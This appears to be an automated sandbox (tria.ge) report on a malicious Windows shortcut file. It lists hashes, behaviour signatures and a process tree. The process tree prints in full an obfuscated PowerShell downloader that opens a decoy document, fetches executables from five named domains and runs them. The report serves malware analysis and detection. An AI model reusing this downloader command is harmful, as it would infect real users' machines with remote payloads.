Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03/05/2024, 11:07

General

  • Target

    105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk

  • Size

    2KB

  • MD5

    105e49bf1a9ac6a8f095ca1e9dfa5958

  • SHA1

    ec9174ecb7de3a9ff2005dc726f4629e645d89d1

  • SHA256

    18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1

  • SHA512

    194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; }; notepad.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2552

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\a.doc

    Filesize

    3KB

    MD5

    259d4d0838b6e0df6374c5c81d213f54

    SHA1

    7d24482a10d90e71a275f42a92987879042c428f

    SHA256

    e7b3fbcacb8348b511ab51c48727f0c5d448185a2cbb84e7485b67f1efff24ae

    SHA512

    c540fbd80875d6538182152ad23afb25bb2c35eb3aacd28e28872b8f6584dbfc8372c1a0e3325a8fca79ad99972b0193197821d039a28eab721f7b2eeab2c6bc

  • memory/2552-46-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2904-38-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp

    Filesize

    4KB

  • memory/2904-39-0x000000001B160000-0x000000001B442000-memory.dmp

    Filesize

    2.9MB

  • memory/2904-40-0x0000000002740000-0x0000000002748000-memory.dmp

    Filesize

    32KB

  • memory/2904-41-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-43-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-44-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-45-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB

  • memory/2904-56-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

    Filesize

    9.6MB